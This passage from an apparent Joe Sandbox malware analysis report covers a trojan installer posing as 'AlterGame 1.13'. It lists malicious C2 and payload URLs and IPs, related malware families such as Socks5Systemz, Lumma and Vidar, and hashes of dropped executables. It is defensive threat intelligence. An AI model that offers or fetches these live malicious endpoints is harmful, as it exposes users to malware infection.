              		unknown
              http://185.156.72.65/add?substr=mixeleven&s=three&sub=nosubtrue
              • Avira URL Cloud: malware
              		unknown
              http://boietuj.com/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31df92d8838ed12a666d307eca743ec4c2b07b529669238658ef814c4ef90true
              • Avira URL Cloud: safe
              		unknown
              http://185.156.72.65/dll/downloadtrue
              • Avira URL Cloud: safe
              		unknown
              http://185.156.72.65/dll/keytrue
              • Avira URL Cloud: safe
              		unknown
              http://boietuj.com/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6atrue
              • Avira URL Cloud: safe
              		unknown
              http://185.156.72.65/files/downloadtrue
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://185.208.158.202/saltergame32.exe, 00000006.00000002.3049178628.0000000003756000.00000004.00000020.00020000.00000000.sdmpfalse
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.innosetup.com/NqISs1vOr.tmp, NqISs1vOr.tmp, 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, is-CUGJK.tmp.3.dr, NqISs1vOr.tmp.2.drfalse
                		high
                http://www.freecommander.com/fchelpxe/de/FreeCommander.htmlaltergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.remobjects.com/psUNqISs1vOr.exe, 00000002.00000003.1902294048.0000000002188000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.exe, 00000002.00000003.1902059776.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.tmp, 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, is-CUGJK.tmp.3.dr, NqISs1vOr.tmp.2.drfalse
                  		high
                  http://freecommander.com/chm/FreeCommanderXE_chm_en.zipaltergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://185.208.158.202/search/?q~waltergame32.exe, 00000006.00000002.3049178628.0000000003756000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://freecommander.com/chm/FreeCommanderXE_chm_de.zipaltergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://freecommander.com/en/downloads/altergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://code.google.com/p/ddab-lib/issues/listaltergame32.exe, 00000006.00000000.1928604067.00000000004CB000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.drfalse
                    		high
                    http://185.208.158.202/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958altergame32.exe, 00000006.00000002.3047839093.0000000000A61000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049094019.00000000036D2000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3047839093.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3047839093.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.freecommander.com/fchelpxe/en/FreeCommander.htmlaltergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.remobjects.com/psNqISs1vOr.exe, 00000002.00000003.1902294048.0000000002188000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.exe, 00000002.00000003.1902059776.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.tmp, NqISs1vOr.tmp, 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, is-CUGJK.tmp.3.dr, NqISs1vOr.tmp.2.drfalse
                      		high
                      https://www.easycutstudio.com/support.htmlNqISs1vOr.exe, 00000002.00000003.1901672648.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.exe, 00000002.00000003.1901741426.0000000002181000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.exe, 00000002.00000002.3047882008.0000000002181000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.tmp, 00000003.00000003.1904023339.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.tmp, 00000003.00000002.3047892256.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, NqISs1vOr.tmp, 00000003.00000003.1904097648.0000000002228000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.tmp, 00000003.00000002.3048327976.0000000002228000.00000004.00001000.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://185.208.158.202/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82daltergame32.exe, 00000006.00000002.3047839093.0000000000A82000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://www.forum.freecommander.com/viewtopic.php?f=6&t=775altergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.drfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        185.156.72.65
                        		unknownRussian Federation
                        		44636ITDELUXE-ASRUtrue
                        185.208.158.202
                        		boietuj.comSwitzerland
                        		34888SIMPLECARRER2ITtrue
                        89.105.201.183
                        		unknownNetherlands
                        		24875NOVOSERVE-ASNLfalse

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1559044
                        Start date and time:2024-11-20 05:01:07 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 7m 37s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:13
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@16/40@1/3
                        EGA Information:
                        • Successful, ratio: 80%
                        HCA Information:
                        • Successful, ratio: 92%
                        • Number of executed functions: 202
                        • Number of non-executed functions: 264
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        23:02:59API Interceptor115x Sleep call for process: altergame32.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.156.72.65file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, Zhark RATBrowse
                        • 185.156.72.65/toload/mixtwo.exe
                        185.208.158.202i7j22nof2Q.exeGet hashmaliciousSocks5SystemzBrowse
                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                            file.exeGet hashmaliciousSocks5SystemzBrowse
                              file.exeGet hashmaliciousSocks5SystemzBrowse
                                file.exeGet hashmaliciousSocks5SystemzBrowse
                                  gxjIKuKnu7.exeGet hashmaliciousSocks5SystemzBrowse
                                    OFjT8HmzFJ.exeGet hashmaliciousSocks5SystemzBrowse
                                      BJqvg1iEdr.exeGet hashmaliciousSocks5SystemzBrowse
                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Socks5Systemz, Stealc, VidarBrowse
                                          G4G14X6zxY.exeGet hashmaliciousSocks5SystemzBrowse
                                            89.105.201.183OFjT8HmzFJ.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 404
                                            N6jsQ3XNNX.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 200
                                            cv viewer plugin 8.31.40.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 200

                                            Domains

                                            No context

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            SIMPLECARRER2IThttp://itrack4.valuecommerce.ne.jp/cgi-bin/2366370/entry.php?vc_url=http://serviceoctopus.comGet hashmaliciousHTMLPhisherBrowse
                                            • 185.208.158.251
                                            0a0#U00a0.jsGet hashmaliciousRHADAMANTHYSBrowse
                                            • 185.196.8.68
                                            i7j22nof2Q.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 185.208.158.202
                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                            • 185.208.158.202
                                            file.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 185.208.158.202
                                            file.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 185.208.158.202
                                            file.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 185.208.158.202
                                            http://www.intelliclicksoftware.net/clicktrack2/click.aspx?ActionType=CreateHistory&CustomerID=GM-CSATRANS&ParentRecordID=&Campaign=Thank%20You%20For%20Your%20Business%20SR&Name=&Company=&Phone=&Email=&Subject=Click%20Through&WebNav=True&URL=http://johnvugrin.comGet hashmaliciousHTMLPhisherBrowse
                                            • 185.196.8.148
                                            gxjIKuKnu7.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 185.208.158.202
                                            https://www.imap.ne.jp/banner_click/add/20/1/?a&url=http://uniteseoul.comGet hashmaliciousHTMLPhisherBrowse
                                            • 185.208.158.9
                                            NOVOSERVE-ASNLi7j22nof2Q.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 89.105.201.183
                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                            • 89.105.201.183
                                            file.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 89.105.201.183
                                            file.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 89.105.201.183
                                            file.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 89.105.201.183
                                            gxjIKuKnu7.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 89.105.201.183
                                            OFjT8HmzFJ.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 89.105.201.183
                                            BJqvg1iEdr.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 89.105.201.183
                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Socks5Systemz, Stealc, VidarBrowse
                                            • 89.105.201.183
                                            G4G14X6zxY.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 89.105.201.183
                                            ITDELUXE-ASRUfile.exeGet hashmaliciousNymaimBrowse
                                            • 185.156.72.65
                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, Zhark RATBrowse
                                            • 185.156.72.65
                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                            • 185.156.72.65
                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Socks5Systemz, Stealc, VidarBrowse
                                            • 185.156.72.65
                                            p0w4g3KGU3.exeGet hashmaliciousSmokeLoaderBrowse
                                            • 185.156.72.78
                                            pdf.jsGet hashmaliciousSmokeLoaderBrowse
                                            • 185.156.72.78
                                            09.09.2024p.pdf.jsGet hashmaliciousSmokeLoaderBrowse
                                            • 185.156.72.78
                                            https://expertpromotions.ru/ukr-net/google/drive/file/832946456397563875683478498385685634984983469239/%D0%9F%D0%BB%D0%B0%D1%82%D0%B5%D0%B6%D0%BD%D0%BE%D0%B5_%D0%BF%D0%BE%D1%80%D1%83%D1%87%D0%B5%D0%BD%D0%B8%D0%B5_%D0%B2_i%D0%BD%D0%BE%D0%B7%D0%B5%D0%BD%D0%BE%D0%B9_%D0%B2%D0%B0%D0%BB%D1%8E%D1%82%D0%B5.rarGet hashmaliciousUnknownBrowse
                                            • 185.156.72.78
                                            svc.exeGet hashmaliciousSmokeLoaderBrowse
                                            • 185.156.72.78
                                            2000 EUR.docGet hashmaliciousSmokeLoaderBrowse
                                            • 185.156.72.78

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\ProgramData\EShineEncoder\sqlite3.dllfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                              file.exeGet hashmaliciousSocks5SystemzBrowse
                                                file.exeGet hashmaliciousSocks5SystemzBrowse
                                                  OXrZ6fj4Hq.exeGet hashmaliciousNeshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWormBrowse
                                                    IrAr85Qv7X.exeGet hashmaliciousMars Stealer, VidarBrowse
                                                      8BQ2v9glrG.exeGet hashmaliciousMars Stealer, VidarBrowse
                                                        BBiIn5gqhd.exeGet hashmaliciousMars Stealer, VidarBrowse
                                                          gacut_837143941.exeGet hashmaliciousUnknownBrowse
                                                            WTsvUl9X8N.exeGet hashmaliciousOski Stealer, VidarBrowse
                                                              PmX1jHdUnS.exeGet hashmaliciousOski Stealer, VidarBrowse

                                                                Created / dropped Files

                                                                C:\ProgramData\EShineEncoder\EShineEncoder.exe

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):4255772
                                                                Entropy (8bit):6.21828901245533
                                                                Encrypted:false
                                                                SSDEEP:49152:rVe7nTYqtRIsJOMDeP3qnfEFqb+O8EC56FLSY9xAVYyyilII:JQROSGqEEC5sWCyaPilv
                                                                MD5:C1DEEF6663EFF952E8990193B3452A2F
                                                                SHA1:A091D2760CF44430E4B5DF078037D6F909463A9D
                                                                SHA-256:232A78BB3A68FDDB2E746BE40125944BBD7AA1B119188520A2ABB0841F5BD027
                                                                SHA-512:84E41F84C48A217D40CC12ADDF8B56B9E2D09A65FC24CCA3CE59EAA2B5D50031059C93D9CC8D480C5F2CA9C967BE64C44080D8A874BD853D060BA5CCD6E9538E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Reputation:low
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L....n.L............................L.............@..........................PA.....B.A.....................................l............_.........................................................................................................._qrsa_4............................. ..`_qrsb_4..*.......,..................@..@_qrsc_4..c...@...0...(..............@....rsrc....`.......`...X..............@..@_qrsd_4..:...."..8....!.............`...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\ProgramData\EShineEncoder\sqlite3.dll

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):645592
                                                                Entropy (8bit):6.50414583238337
                                                                Encrypted:false
                                                                SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: OXrZ6fj4Hq.exe, Detection: malicious, Browse
                                                                • Filename: IrAr85Qv7X.exe, Detection: malicious, Browse
                                                                • Filename: 8BQ2v9glrG.exe, Detection: malicious, Browse
                                                                • Filename: BBiIn5gqhd.exe, Detection: malicious, Browse
                                                                • Filename: gacut_837143941.exe, Detection: malicious, Browse
                                                                • Filename: WTsvUl9X8N.exe, Detection: malicious, Browse
                                                                • Filename: PmX1jHdUnS.exe, Detection: malicious, Browse
                                                                Reputation:high, very likely benign file
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..

                                                                C:\ProgramData\es1115it43.dat

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):8
                                                                Entropy (8bit):2.0
                                                                Encrypted:false
                                                                SSDEEP:3:YC/lln:vXn
                                                                MD5:94BDFB9D097CEE9404D361DBC089DAC8
                                                                SHA1:6E0193957EE374472E156774CDDD2ECBBC53D76F
                                                                SHA-256:0FEE2C7FCA72F8D47690D4575BCC3067D678A5053A081E07AF2B766F0AD38802
                                                                SHA-512:04A6E9F7ADFDE696E539CEEA55BFD14FE32EE6646478F427B66F720E8B2A3E9470E58C04CBD192D6803276C0062AD2AB4209D0C135795C8053DCF6088681B652
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:._=g....

                                                                C:\ProgramData\es1115rc43.dat

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):4
                                                                Entropy (8bit):0.8112781244591328
                                                                Encrypted:false
                                                                SSDEEP:3:yln:2n
                                                                MD5:9A30CB647A6BDD7B520EE3A072881D16
                                                                SHA1:5DC0E1CF689CB31A6C529DC8DDB9D677123E97F7
                                                                SHA-256:0AB677189BBD88D8D69ABCEB88946F32A36333B36D4E75CB1AE69EF3C4CF1FC2
                                                                SHA-512:152D87A8A4E15495F498F2BC2D24D07A7F38837D96846DA412BE5C0C44FE4F9BB803C3E7F0ADCCF801DCB392D7113011052E52048337EC1A6ADE15576BAB9DB6
                                                                Malicious:false
                                                                Preview:G...

                                                                C:\ProgramData\es1115resa.dat

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):128
                                                                Entropy (8bit):2.9545817380615236
                                                                Encrypted:false
                                                                SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                                MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                                SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                                SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                                SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                                Malicious:false
                                                                Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................

                                                                C:\ProgramData\es1115resb.dat

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):128
                                                                Entropy (8bit):1.7095628900165245
                                                                Encrypted:false
                                                                SSDEEP:3:LDXdQSWBdMUE/:LLdQSGd
                                                                MD5:4FFFD4D2A32CBF8FB78D521B4CC06680
                                                                SHA1:3FA6EFA82F738740179A9388D8046619C7EBDF54
                                                                SHA-256:EC52F73A17E6AFCF78F3FD8DFC7177024FEB52F5AC2B602886788E4348D5FB68
                                                                SHA-512:130A074E6AD38EEE2FB088BED2FCB939BF316B0FCBB4F5455AB49C2685BEEDCB5011107A22A153E56BF5E54A45CA4801C56936E71899C99BA9A4F694A1D4CC6D
                                                                Malicious:false
                                                                Preview:dad6f9fa0c8327344d1aa24f183c3767................................................................................................

                                                                C:\Users\user\AppData\Local\AlterGame 1.13\AlterGame.chm (copy)

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:MS Windows HtmlHelp Data
                                                                Category:dropped
                                                                Size (bytes):78183
                                                                Entropy (8bit):7.692742945771669
                                                                Encrypted:false
                                                                SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                Malicious:false
                                                                Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet

                                                                C:\Users\user\AppData\Local\AlterGame 1.13\LTDIS13n.dll (copy)

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):265728
                                                                Entropy (8bit):6.4472652154517345
                                                                Encrypted:false
                                                                SSDEEP:6144:Fs7u3JL96d15Y2BmKh678IuYAhN3YCjlgiZioXyLWvCe93rZ5WZOlUmpNJ5mlbb/:e7WJL96d15Y2BmKh678IuYAhN3YCjlgw
                                                                MD5:752CA72DE243F44AF2ED3FF023EF826E
                                                                SHA1:7B508F6B72BD270A861B368EC9FE4BF55D8D472F
                                                                SHA-256:F8196F03F8CBED87A92BA5C1207A9063D4EEBB0C22CA88A279F1AE1B1F1B8196
                                                                SHA-512:4E5A7242C25D4BBF9087F813D4BF057432271A0F08580DA8C894B7C290DE9E0CF640F6F616B0B6C6CAD14DC0AFDD2697D2855BA4070270824540BAE835FE8C4A
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..=...........!................`;.......................................P.......................'..............p...o.......d.... .......................0..\.......................................................4............................text...k........................... ..`.rdata..............................@..@.data....9.......0..................@....idata..............................@....rsrc........ ......................@..@.reloc..T....0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:modified
                                                                Size (bytes):4255772
                                                                Entropy (8bit):6.21828901245533
                                                                Encrypted:false
                                                                SSDEEP:49152:rVe7nTYqtRIsJOMDeP3qnfEFqb+O8EC56FLSY9xAVYyyilII:JQROSGqEEC5sWCyaPilv
                                                                MD5:C1DEEF6663EFF952E8990193B3452A2F
                                                                SHA1:A091D2760CF44430E4B5DF078037D6F909463A9D
                                                                SHA-256:232A78BB3A68FDDB2E746BE40125944BBD7AA1B119188520A2ABB0841F5BD027
                                                                SHA-512:84E41F84C48A217D40CC12ADDF8B56B9E2D09A65FC24CCA3CE59EAA2B5D50031059C93D9CC8D480C5F2CA9C967BE64C44080D8A874BD853D060BA5CCD6E9538E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L....n.L............................L.............@..........................PA.....B.A.....................................l............_.........................................................................................................._qrsa_4............................. ..`_qrsb_4..*.......,..................@..@_qrsc_4..c...@...0...(..............@....rsrc....`.......`...X..............@..@_qrsd_4..:...."..8....!.............`...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\AlterGame 1.13\bjpeg23.dll (copy)

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):176128
                                                                Entropy (8bit):6.204917493416147
                                                                Encrypted:false
                                                                SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\AlterGame 1.13\gdiplus.dll (copy)

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1645320
                                                                Entropy (8bit):6.787752063353702
                                                                Encrypted:false
                                                                SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                MD5:871C903A90C45CA08A9D42803916C3F7
                                                                SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
